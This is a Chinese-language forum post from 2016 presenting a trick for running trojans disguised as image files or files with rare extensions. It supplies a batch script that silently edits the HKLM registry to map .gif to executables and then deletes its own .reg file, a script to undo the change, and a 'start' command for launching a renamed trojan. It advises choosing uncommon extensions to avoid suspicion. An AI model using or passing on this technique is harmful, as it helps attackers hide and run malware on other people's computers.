|
|
任意文件当做木马来运行
你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。
ps:最好不要改成常用的文件类型,因为这样可能引起怀疑,最好改成不常用的文件后缀,比如:.Tgl,frc等
这样不影响原来系统功能,又能深藏起来- 更改exe为gif:(这里你可以把Exe改成其他,如:TGl)
- 复制内容到剪贴板 程序代码@echo off
- color 1A
- ECHO windows Registry Editor Version 5.00>gif.reg
- ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
- ECHO “Content Type”=“application/x-msdownload”>>gif.reg
- ECHO @=“exefile”>>gif.reg
- regedit /s gif.reg>nul 2>nul
- del /s gif.reg>nul 2>nul
- 这个代码保存成。BAT的文件。
- 先运行这个BAT文件系统会把。GIF文件来当做应用程序来运行
- 当然我们的木马后缀要换成。GIF 的,嘻嘻。
- 恢复gif默认:
- 复制内容到剪贴板 程序代码@echo off
- color 1A
- ECHO Windows Registry Editor Version 5.00>gif.reg
- ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg
- ECHO “Content Type”=“image/gif”>>gif.reg
- ECHO @=“giffile”>>gif.reg
- regedit /s gif.reg>nul 2>nul
- del /s gif.reg>nul 2>nul
- 这个代码保存成。BAT的文件。
- 另外,根据以前看到过的一篇文章 CMD也闹鬼,一文,我们还可以在批处理里面运行这类文件病毒,且不用上面的步骤,直接把你的EXE改成其他文件类型,然后面CMD下面,运行:
- Start 木马.GPL
- 同样,也可以运行你的木马。是不是更简单?
|
|
/1 
雷达卡
UID
威望
主题
精华
贡献
墨币
活跃
担保币
发表于 2016-5-7 02:19:57
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
